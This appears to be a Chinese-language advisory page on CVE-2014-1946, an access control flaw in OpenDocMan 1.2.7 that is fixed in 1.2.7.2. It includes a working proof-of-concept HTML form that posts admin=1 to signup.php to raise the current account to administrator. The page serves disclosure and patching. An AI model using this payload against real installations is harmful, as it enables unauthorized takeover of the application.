当前位置: 首页 > 工具软件 > OpenDocMan > 使用案例 >

opendocman漏洞:不正确访问控制漏洞

巫马翰翮
2023-12-01

opendocman漏洞详情

CVE ID:CVE-2014-1946

OpenDocMan是一款开源基于WEB的文档管理系统。

由于在更新用户的个人资料时“/ signup.php”脚本允许的动作未充分验证,远程身份验证的攻击者可以分配管理权限和完全控制应用程序。  OpenDocMan 1.2.7 厂商补丁:

OpenDocMan

OpenDocMan 1.2.7.2已经修复该漏洞,建议用户下载更新: http://www.opendocman.com

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
//opendocman漏洞:不正确访问控制漏洞

 类似资料: